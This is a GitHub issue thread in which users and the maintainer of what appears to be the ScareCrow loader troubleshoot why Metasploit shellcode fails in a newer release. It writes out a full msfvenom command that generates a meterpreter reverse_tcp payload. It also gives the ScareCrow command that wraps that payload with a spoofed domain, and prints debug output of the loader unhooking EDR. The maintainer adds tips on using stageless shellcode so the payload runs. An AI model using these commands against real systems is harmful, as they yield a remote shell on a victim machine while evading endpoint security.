Tylous
commented
2 years ago Does this happen with other loaders?
Closed gumbyDE closed 2 years ago
Tylous
commented
2 years ago Does this happen with other loaders?
gumbyDE
commented
2 years ago I just tested it again today. It works with a Covenant grunt, but not with msfvenom.
I even got an exception today:
# .\scarecrow_new.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes
.\scarecrow_new.exe : Exception 0xc0000005 0x0 0xd8f5374000 0xc00006c000
At line:1 char:4
+ . {.\scarecrow_new.exe
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (Exception 0xc00...00 0xc00006c000:String) [], Remote
Exception
+ FullyQualifiedErrorId : NativeCommandError
PC=0xc00006c000
runtime.cgocall
(
0xfe800
,
0x25bb80
)
runtime/cgocall.go
:
157
+
0x4a
fp=0xc00009be18 sp=0xc00009bde0 pc=0xa342a
syscall.SyscallN
(
0xc00006c000
?
,
{
0xc00009beb0
?
,
0x3
?
,
0xac787
?
}
)
runtime/syscall_windows.go
:
538
+
0x109
fp=
0xc00009be90
sp=
0xc00009be18
pc=
0xf9ba9
syscall.Syscall
(
0x180050
?
,
0xc00000d050
?
,
0x5
?
,
0x5
?
,
0x0
?
)
runtime/syscall_windows.go
:
476
+
0x3b
fp=
0xc00009bed8
sp=
0xc00009be90
pc=
0xf997b
main.main
(
)
AM_2dKM3.go
:
1
+
0x2c7
fp=
0xc00009bf80
sp=
0xc00009bed8
pc=
0x15e967
runtime.main
(
)
runtime/proc.go
:
250
+
0x1fe
fp=
0xc00009bfe0
sp=
0xc00009bf80
pc=
0xd601e
runtime.goexit
(
)
runtime/asm_amd64.s
:
1571
+
0x1
fp=
0xc00009bfe8
sp=
0xc00009bfe0
pc=
0xfcfa1
rax
0xc00006c000
rbx
0x25bb80
rcx
0x0
rdi 0x18f5308000
rsi 0xc00009be50
rbp 0xc00009be08
rsp 0x18f55ff698
r8 0x0
r9 0x0
r10 0x0
r11 0x202
r12 0x0
r13 0x0
r14 0xc000030000
r15 0xffffffffffffffff
rip 0xc00006c000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2bwhat happens when you try -Loader dll?
gumbyDE
commented
2 years ago Sorry, I think I initially misunderstood your question. I totally spaced out and forgot that you can create multiple payloads with the loader option and thought you meant the payload.
I tried it with the -Loader dll option and it worked. No crash, no exception, just worked.
Tylous
commented
2 years ago I think it has to do with how MSF shellcode needed the pointer. Since Binary loaders call the shellcode differently than the other loaders. Still investigating.
Tylous
commented
2 years ago So after some digging, it looks like stageless MSFvenom shellcode works. As I mention in the README you need to use stageless shellcode.
gumbyDE
commented
2 years ago I got it to work using the non-staged payload. Interesting that the old version managed it somehow but the new one doesn't. Will use this one for now.
I created a msfvenom payload with
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=5555 -f raw -o msfvenom.binand then put it into ScareCrow with
/opt/ScareCrow/ScareCrow -I /tmp/msfvenom.bin -domain google.comDoing it with version 4.01 results in a successful connection. However, when I update to the newest version 4.1 and try the same, I don't get anything back.
I enabled the console output but there are no error messages (this is the output when I tried the -injection method, but still had no luck):
Any ideas are appreciated.